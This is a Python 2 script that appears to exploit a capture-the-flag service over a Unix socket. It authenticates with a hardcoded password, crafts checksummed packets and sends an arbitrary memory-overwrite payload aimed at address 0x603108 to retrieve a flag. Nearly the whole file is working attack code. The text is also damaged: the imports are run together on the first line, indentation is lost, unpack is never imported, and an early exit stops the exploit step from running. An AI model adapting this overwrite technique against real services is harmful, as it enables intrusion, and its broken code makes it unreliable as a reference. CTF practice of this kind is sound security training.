import socketfrom struct import packimport sysimport zlibsrv_addr = "\

1. import socket
2. from struct import pack
3. import sys
4. import zlib
5.  
6. srv_addr = "\x00secretSock"
7. PASSWORD = "DA777"
8. testHash = "f312e0cbe28c22ad7e6c46b989804e2c"
9. BUFFER_HEADER_LENGTH = 8 + len(PASSWORD) + 1
10. BUFFER_LENGTH = 269
11. ANSWER_PACKET_LENGTH = 256
12.  
13. OVERWRITE_ADDR = 0x603108
14. #OVERWRITE_DATA_ADDR = -0x7fffffffdfc0 # offset to flag location (which is empty ATM)
15. OVERWRITE_DATA_ADDR = 0xffffffffffffffff # offset to flag location (which is empty ATM)
16. OVERWRITE_DATA_ADDR = '\xff' * 16# offset to flag location (which is empty ATM)
17.  
18.  
19. sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
20.  
21. def hexdump(src, length=16):
22. FILTER = ''.join([(len(repr(chr(x))) == 3) and chr(x) or '.' for x in range(256)])
23. lines = []
24. for c in xrange(0, len(src), length):
25. chars = src[c:c+length]
26. hex = ' '.join(["%02x" % ord(x) for x in chars])
27. printable = ''.join(["%s" % ((ord(x) <= 127 and FILTER[ord(x)]) or '.') for x in chars])
28. lines.append("%04x %-*s %s\n" % (c, length*3, hex, printable))
29. return ''.join(lines)
30.  
31. def db(v):
32. return pack("<B", v)
33.  
34. def dw(v):
35. return pack("<H", v)
36.  
37. def dd(v):
38. return pack("<I", v)
39.  
40. def dq(v):
41. return pack("<Q", v)
42.  
43. def rb(v):
44. return unpack("<B", v[0])[0]
45.  
46. def rw(v):
47. return unpack("<H", v[:2])[0]
48.  
49. def rd(v):
50. return unpack("<I", v[:4])[0]
51.  
52. def rq(v):
53. return unpack("<Q", v[:8])[0]
54.  
55. def connectToServer():
56. try:
57. sock.connect(srv_addr)
58. except socket.error, msg:
59. print("Socket connect error: ", msg)
60. sys.exit(1)
61.  
62. return sock
63.  
64.  
65. def sendData(buf, operation):
66. if len(buf) == 0:
67. buf = "\x00"*(BUFFER_LENGTH - BUFFER_HEADER_LENGTH) # create empty buffer
68. else:
69. buf += "\x00"*(BUFFER_LENGTH - (BUFFER_HEADER_LENGTH + len(buf))) # fill with zeros
70.  
71. if not isinstance(operation, int):
72. print("Operation must be int")
73. return ""
74.  
75. if len(buf) != (BUFFER_LENGTH - BUFFER_HEADER_LENGTH):
76. print("buffer length (%d) is too long or too short!" % len(buf))
77. print hexdump(buf)
78. return ""
79.  
80. header = dq(0)
81. header += PASSWORD
82. header += db(operation)
83.  
84. payload = header + buf
85. payload_hash = zlib.adler32(payload)
86. payload = dq(payload_hash) + payload[8:]
87.  
88. len_sent = sock.send(payload)
89. if len_sent != BUFFER_LENGTH:
90. print("Error: Didn't sent all buffer, sent only %d" % len_sent)
91.  
92. data = sock.recv(ANSWER_PACKET_LENGTH)
93. print "Recived %d bytes" % len(data)
94. print hexdump(data)
95.  
96. return data
97.  
98. print 'Connecting to server...'
99. connectToServer()
100. if sendData("",1): # init connection (and server init db data)
101. print("Connected successfully")
102.  
103. # populate db
104. sendData("", 4)
105.  
106. payload = dq(1 * 256)
107. if sendData(payload, 3):
108. print "Done 0"
109. payload = dq(2 * 256)
110. if sendData(payload, 3):
111. print "Done 1"
112. payload = dq(3 * 256)
113. if sendData(payload, 3):
114. print "Done 2"
115. sock.close()
116. exit(0)
117.  
118. # overwrite payload
119. payload = testHash
120. payload += OVERWRITE_DATA_ADDR
121. payload += dq(OVERWRITE_ADDR)
122. print 'Sending exploit...'
123. if sendData(payload, 2):
124. # get flag
125. print 'Getting flag...'
126. sendData("", 4)
127.  
128. print 'closing socket'
129. sock.close()